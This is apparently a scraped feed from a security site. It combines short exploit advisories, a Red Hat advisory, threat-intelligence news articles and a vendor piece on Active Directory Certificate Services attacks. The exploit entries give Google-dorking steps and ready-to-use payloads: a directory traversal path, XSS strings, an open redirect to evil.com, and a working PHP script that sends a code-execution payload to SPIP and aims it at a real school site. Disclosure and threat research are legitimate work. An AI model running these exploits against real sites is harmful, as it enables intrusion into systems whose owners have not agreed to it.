Webpay E-Commerce version 1.0 suffers from a directory traversal vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 Directory traversal Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : //bower_components/bootstrap/dist/css/../../Gemfile[+] https://www/127.0.0.1/demo/gajrajgraphics.com.np/home/bower_components/bootstrap/dist/css/../../GemfileGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 Directory Traversal

Red Hat Security Advisory 2024-6044-03 - Red Hat Advanced Cluster Management for Kubernetes 2.11.2 General Availability release images, which fix bugs and update container images. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6044.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Low: Red Hat Advanced Cluster Management 2.11.2 bug fixes and container updates  
Advisory ID:        RHSA-2024:6044-03  
Product:            Red Hat ACM  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6044  
Issue date:         2024-08-29  
Revision:           03  
CVE Names:          CVE-2022-25883  
====================================================================

Summary: 

Red Hat Advanced Cluster Management for Kubernetes 2.11.2 General  
Availability release images, which fix bugs and update container images.

Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.

Description:

Red Hat Advanced Cluster Management for Kubernetes 2.11.2 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/

Security fix(es):  
CVE-2022-25883 nodejs-semver: Regular expression denial of service

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-25883

References:

https://access.redhat.com/security/updates/classification/#low  
https://issues.redhat.com/browse/ACM-12908  
https://issues.redhat.com/browse/ACM-13041

Red Hat Security Advisory 2024-6044-03

SPIP version 4.2.6 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.6 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.6 Code Execution

WordPress GetYourGuide Ticketing plugin version 1.0.6 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : WordPress GetYourGuide Ticketing plugin 1.0.6 XSS Vulnerability                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://downloads.wordpress.org/plugin/getyourguide-ticketing.1.0.6.zip                                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : <input type="text" name="partner_hash" value="<?php echo $partner_hash?>"></input>[+] Install the plugin ‘GetYourGuide Ticketing’ & activate it.[+] Navigate toward the GYG-Ticketing.[+] USe Payload : ` “><img src=x onerror=alert(1)>`[+] Go to link builder to verify the XSS pop-up.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

WordPress GetYourGuide Ticketing 1.0.6 Cross Site Scripting

WordPress SeatReg plugin version 1.54.0 suffers from an open redirection vulnerability.

    =============================================================================================================================================| # Title     : WordPress SeatReg plugin 1.54.0 open redirection Vulnerability                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://wordpress.org/plugins/seatreg/                                                                                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] An Open Redirection is a vulnerability when a web application or server    uses an unvalidated user-submitted link to redirect the user to a given    website or page.[+] USe Payload : new-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&*_wp_http_referer=https://evil.com[+] POST /wp-admin/admin-post.php HTTP/1.1Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

WordPress SeatReg 1.54.0 Open Redirection

WordPress WP Event Manager plugin version 3.1.44 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : WordPress WP Event Manager plugin 3.1.44 XSS Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://wordpress.org/plugins/wp-event-manager/                                                                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Install the plugins - wp-event-manager and activate it.[+] Go to event manager —> Add New - Inside the “”Event Title” at the top, enter XSS payload “><img src=xonerror=alert(1)> and hit publish.[+] Check the newly made event’s URL /event/{id}/ , XSS will trigger.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

WordPress WP Event Manager 3.1.44 Cross Site Scripting

Cybersecurity researchers have uncovered a novel malware campaign that leverages Google Sheets as a command-and-control (C2) mechanism.
The activity, detected by Proofpoint starting August 5, 2024, impersonates tax authorities from governments in Europe, Asia, and the U.S., with the goal of targeting over 70 organizations worldwide by means of a bespoke tool called Voldemort that's equipped to

Cybersecurity researchers have uncovered a novel malware campaign that leverages Google Sheets as a command-and-control (C2) mechanism.

The activity, detected by Proofpoint starting August 5, 2024, impersonates tax authorities from governments in Europe, Asia, and the U.S., with the goal of targeting over 70 organizations worldwide by means of a bespoke tool called Voldemort that's equipped to gather information and deliver additional payloads.

Targeted sectors include insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom, and social benefit organizations.

The suspected cyber espionage campaign has not been attributed to a specific named threat actor. As many as 20,000 email messages have been sent as part of the attacks.

These emails claim to be from tax authorities in the U.S., the U.K., France, Germany, Italy, India, and Japan, alerting recipients about changes to their tax filings and urging them to click on Google AMP Cache URLs that redirect users to an intermediate landing page.

What the page does is inspect the User-Agent string to determine if the operating system is Windows, and if so, leverage the search-ms: URI protocol handler to display a Windows shortcut (LNK) file that uses an Adobe Acrobat Reader to masquerade as a PDF file in an attempt to trick the victim into launching it.

"If the LNK is executed, it will invoke PowerShell to run Python.exe from a third WebDAV share on the same tunnel (\\library\\), passing a Python script on a fourth share (\\resource\\) on the same host as an argument," Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson said.

"This causes Python to run the script without downloading any files to the computer, with dependencies being loaded directly from the WebDAV share."

The Python script is designed to gather system information and send the data in the form of a Base64-encoded string to an actor-controlled domain, after which it shows a decoy PDF to the user and downloads a password-protected ZIP file from OpenDrive.

The ZIP archive, for its part, contains two files, a legitimate executable "CiscoCollabHost.exe" that's susceptible to DLL side-loading and a malicious DLL "CiscoSparkLauncher.dll" (i.e., Voldemort) file that's sideloaded.

Voldemort is a custom backdoor written in C that comes with capabilities for information gathering and loading next-stage payloads, with the malware utilizing Google Sheets for C2, data exfiltration, and executing commands from the operators.

Proofpoint described the activity as aligned to advanced persistent threats (APT) but carrying "cybercrime vibes" owing to the use of techniques popular in the e-crime landscape.

"Threat actors abuse file schema URIs to access external file sharing resources for malware staging, specifically WebDAV and Server Message Block (SMB). This is done by using the schema 'file://' and pointing to a remote server hosting the malicious content," the researchers said.

This approach has been increasingly prevalent among malware families that act as initial access brokers (IABs), such as Latrodectus, DarkGate, and XWorm.

Furthermore, Proofpoint said it was able to read the contents of the Google Sheet, identifying a total of six victims, including one that's believed to be either a sandbox or a "known researcher."

The campaign has been branded unusual, raising the possibility that the threat actors cast a wide net before zeroing in on a small pool of targets. It's also possible that the attackers, likely with varying levels of technical expertise, planned to infect several organizations.

"While many of the campaign characteristics align with cybercriminal threat activity, we assess this is likely espionage activity conducted to support as yet unknown final objectives," the researchers said.

"The Frankensteinian amalgamation of clever and sophisticated capabilities, paired with very basic techniques and functionality, makes it difficult to assess the level of the threat actor's capability and determine with high confidence the ultimate goals of the campaign."

The development comes as Netskope Threat Labs uncovered an updated version of the Latrodectus (version 1.4) that comes with a new C2 endpoint and adds two new backdoor commands that allow it to download shellcode from a specified server and retrieve arbitrary files from a remote location.

"Latrodectus has been evolving pretty fast, adding new features to its payload," security researcher Leandro Fróes said. "The understanding of the updates applied to its payload allows defenders to keep automated pipelines properly set as well as use the information for further hunting for new variants."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cyberattackers Exploit Google Sheets for Malware Control in Likely Espionage Campaign

Cybersecurity researchers have unearthed new network infrastructure set up by Iranian threat actors to support activities linked to the recent targeting of U.S. political campaigns.
Recorded Future's Insikt Group has linked the infrastructure to a threat it tracks as GreenCharlie, an Iran-nexus cyber threat group that overlaps with APT42, Charming Kitten, Damselfly, Mint Sandstorm (formerly

Cyber Threat / Cyber Espionage

Cybersecurity researchers have unearthed new network infrastructure set up by Iranian threat actors to support activities linked to the recent targeting of U.S. political campaigns.

Recorded Future's Insikt Group has linked the infrastructure to a threat it tracks as GreenCharlie, an Iran-nexus cyber threat group that overlaps with APT42, Charming Kitten, Damselfly, Mint Sandstorm (formerly Phosphorus), TA453, and Yellow Garuda.

"The group's infrastructure is meticulously crafted, utilizing dynamic DNS (DDNS) providers like Dynu, DNSEXIT, and Vitalwerks to register domains used in phishing attacks," the cybersecurity company said.

"These domains often employ deceptive themes related to cloud services, file sharing, and document visualization to lure targets into revealing sensitive information or downloading malicious files."

Examples include terms like "cloud," "uptimezone," "doceditor," "joincloud," and "pageviewer," among others. A majority of the domains were registered using the .info top-level domain (TLD), a shift from the previously observed .xyz, .icu, .network, .online, and .site TLDs.

The adversary has a track record of staging highly-targeted phishing attacks that leverage extensive social engineering techniques to infect users with malware like POWERSTAR (aka CharmPower and GorjolEcho) and GORBLE, which was recently identified by Google-owned Mandiant as used in campaigns against Israel and U.S.

GORBLE, TAMECAT, and POWERSTAR are assessed to be variants of the same malware, a series of ever-evolving PowerShell implants deployed by GreenCharlie over the years. It's worth noting that Proofpoint detailed another POWERSTAR successor dubbed BlackSmith that was used in a spear-phishing campaign targeting a prominent Jewish figure in late July 2024.

The infection process is often a multi-stage one, which involves gaining initial access through phishing, followed by establishing communication with command-and-control (C2) servers, and ultimately exfiltrating data or delivering additional payloads.

Recorded Future's findings show that the threat actor registered a large number of DDNS domains since May 2024, with the company also identifying communications between Iran-based IP addresses (38.180.146\[.\]194 and 38.180.146\[.\]174) and GreenCharlie infrastructure between July and August 2024.

Furthermore, a direct link has been unearthed between GreenCharlie clusters and C2 servers used by GORBLE. It's believed that the operations are facilitated by means of Proton VPN or Proton Mail to obfuscate their activity.

"GreenCharlie's phishing operations are highly targeted, often employing social engineering techniques that exploit current events and political tensions," Recorded Future said.

"The group has registered numerous domains since May 2024, many of which are likely used for phishing activities. These domains are linked to DDNS providers, which allow for rapid changes in IP addresses, making it difficult to track the group's activities."

The disclosure comes amid a ramping up of Iranian malicious cyber activity against the U.S. and other foreign targets. Earlier this week, Microsoft revealed that multiple sectors in the U.S. and the U.A.E. are the target of an Iranian threat actor codenamed Peach Sandstorm (aka Refined Kitten).

Additionally, U.S. government agencies said yet another Iranian state-backed hacking crew, Pioneer Kitten, has moonlighted as an initial access broker (IAB) for facilitating ransomware attacks against education, finance, healthcare, defense, and government sectors in the U.S. in collaboration with NoEscape, RansomHouse, and BlackCat crews.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Iranian Hackers Set Up New Network to Target U.S. Political Campaigns

Cybersecurity researchers have disclosed a new campaign that potentially targets users in the Middle East through malware that disguises itself as Palo Alto Networks GlobalProtect virtual private network (VPN) tool.

"The malware can execute remote PowerShell commands, download and exfiltrate files, encrypt communications, and bypass sandbox solutions, representing a significant threat to

Malware / Network Security

Cybersecurity researchers have disclosed a new campaign that potentially targets users in the Middle East through malware that disguises itself as Palo Alto Networks GlobalProtect virtual private network (VPN) tool.

"The malware can execute remote PowerShell commands, download and exfiltrate files, encrypt communications, and bypass sandbox solutions, representing a significant threat to targeted organizations," Trend Micro researcher Mohamed Fahmy said in a technical report.

The sophisticated malware sample has been observed employing a two-stage process and involves setting up connections to command-and-control (C2) infrastructure that purports to be a company VPN portal, allowing the threat actors to operate freely without tripping any alarms.

The initial intrusion vector for the campaign is currently unknown, although it's suspected to involve the use of phishing techniques to deceive users into thinking that they are installing the GlobalProtect agent. The activity has not been attributed to a specific threat actor or group.

The starting point is a setup.exe binary that deploys the primary backdoor component called GlobalProtect.exe, which, when installed, initiates a beaconing process that alerts the operators of the progress.

The first-stage executable is also responsible for dropping two additional configuration files (RTime.conf and ApProcessId.conf) that are used to exfiltrate system information to a C2 server (94.131.108\[.\]78), including the victim's IP address, operating system information, username, machine name, and sleep time sequence.

"The malware implements an evasion technique to bypass behavior analysis and sandbox solutions by checking the process file path and the specific file before executing the main code block," Fahmy noted.

The backdoor serves as a conduit to upload files, download next-stage payloads, and execute PowerShell commands. The beaconing to the C2 server takes place by means of the Interactsh open-source project.

"The malware pivots to a newly registered URL, 'sharjahconnect' (likely referring to the U.A.E. emirate Sharjah), designed to resemble a legitimate VPN portal for a company based in the U.A.E.," Fahmy said.

"This tactic is designed to allow the malware's malicious activities to blend in with expected regional network traffic and enhance its evasion characteristics."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Malware Masquerades as Palo Alto VPN Targeting Middle East Users

The most dangerous vulnerability you’ve never heard of.
In the world of cybersecurity, vulnerabilities are discovered so often, and at such a high rate, that it can be very difficult to keep up with. Some vulnerabilities will start ringing alarm bells within your security tooling, while others are far more nuanced, but still pose an equally dangerous threat. Today, we want to discuss one of

**_The most dangerous vulnerability you've never heard of._**

In the world of cybersecurity, vulnerabilities are discovered so often, and at such a high rate, that it can be very difficult to keep up with. Some vulnerabilities will start ringing alarm bells within your security tooling, while others are far more nuanced, but still pose an equally dangerous threat. Today, we want to discuss one of these more nuanced vulnerabilities as it is likely lurking in your environment waiting to be exploited: Active Directory Certificate Services vulnerabilities.

vPenTest by Vonahi Security recently implemented an attack vector specifically designed to identify and mitigate these hidden AD CS threats. But first, let's explore why AD CS vulnerabilities are so dangerous and how they work.

****What is Active Directory Certificate Services?****

Active Directory Certificate Services ("AD CS"), as defined by Microsoft is, "a Windows Server role for issuing and managing public key infrastructure (PKI) certificates used in secure communication and authentication protocols." Some common features and services that rely on AD CS are:

*   The Windows Logon Process
*   Enterprise VPN and Wireless Networks
*   Email Encryption and Digital Signatures
*   Smart Card Authentication

As companies continue to increase the variety of technologies available within their organizations, AD CS will become more common and more necessary, especially as companies continue to host their services in the cloud. Many AWS, Azure and GCP services require certificate-based authentication to function, so it is expected that AD CS will become an increasingly prominent and required service in modern multi-cloud networks.

****Hidden hazards.****

As with all powerful tools, there is a responsibility to maintain these tools properly, as they can very often be misused without the proper safeguards. This is indeed the case with AD CS. Since AD CS is a core component of the modern Windows and Active Directory authentication and authorization framework, any vulnerabilities that exist pose a great risk to those environments. As we saw 6-7 years ago with Kerberos, and continue to see today, if key authentication infrastructure is compromised, it can be abused to great lengths. The same is the case with AD CS, if not to a greater extent.

****AD CS Attack Basics****

AD CS attacks rely on the fact that the domain trusts the Certificate Authority ("CA") server as much as it trusts its Kerberos servers and other identity servers. Think of the CA server as a gatekeeper. Just as a gatekeeper controls access to a secure area, the CA server controls the distribution and validation of certificates, ensuring that only trusted entities can gain access.

However, AD CS attacks leverage this fact in order to circumvent the need for things like passwords or encryption keys. There are four major classes of AD CS vulnerabilities:

*   ESC – This class of vulnerabilities results in some level of privilege escalation within the victim network / domain. Attackers can abuse these vulnerabilities to convert their access from a low- privileged user, to the domain administrator, with little to no effort.
*   THEFT – These vulnerabilities are present when there are not significant security controls around the client endpoint, which allow for the authentication certificates to be stolen, resulting in either privilege escalation or persistence in the environment.
*   PERSIST – As the name states, these vulnerabilities result in a situation in the network environment in which the attacker can abuse their access to a certificate in order to persist their access in an environment, without the need for a password.
*   CVE – Separate from the first three classes, these vulnerabilities are based on abusing certain known vulnerabilities within AD CS that have patches.

Critically worth noting is that, while Microsoft does track and have patches released for the AD CS vulnerabilities that have been assigned CVEs, for the majority of these vulnerabilities, Microsoft puts the onus of repair and security on the consumer, which leads to the presence of these vulnerabilities much more often.

The most dangerous of the AD CS vulnerability categories is the ESC category (ESC as in privilege escalation). These pose the greatest threat to the user's environment as they require little to no privileges, depending on the specific misconfiguration. One such misconfiguration is the ESC2 vulnerability, which occurs from a server's need to impersonate certain users under particular circumstances.

This attack allows a standard user to enroll for a certificate by impersonating them via the request's on-behalf-of field. By doing this, a standard low privileged user can pretend they are the domain administrator and request certificates, and later their NTLM hash, resulting in full compromise of the domain administrator account, and typically the whole domain. Check out the demo to see how an attacker might exploit this by using the AD CS hacking tool, Certipy.

****What should you do?****

As discussed, Microsoft does not have patches that make fixing or identifying these vulnerabilities easy for their users, so the responsibility falls on the users of AD CS to secure their own systems, which can be challenging. So, what to do?

Built by the discoverers of this vulnerability class, https://github.com/GhostPack/PSPKIAudit is a PowerShell framework designed to do a lot of the heavy lifting for you and identify any offending vulnerabilities in the AD CS configuration. However, even if you do rule out these vulnerabilities at one point in time, they may resurface alongside the addition of new tools to the environment. That's where vPenTest by Vonahi Security comes in.

vPenTest is a state-of-the-art automated penetration testing tool that takes charge of your network, performing comprehensive security assessments automatically, allowing your business to continue to focus on what matters the most for you. vPenTest has built-in detections for AD CS vulnerabilities and can demonstrate impact by exploiting the vulnerabilities in the network so you can show the relevant stakeholders why they need to care about these vulnerabilities. Check out vPenTest today!

_Credits to the SpecterOps team for their wonderful research into the subject and to ly4k for developing such an amazing tool, Certipy, to help identify these vulnerabilities._

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Latest News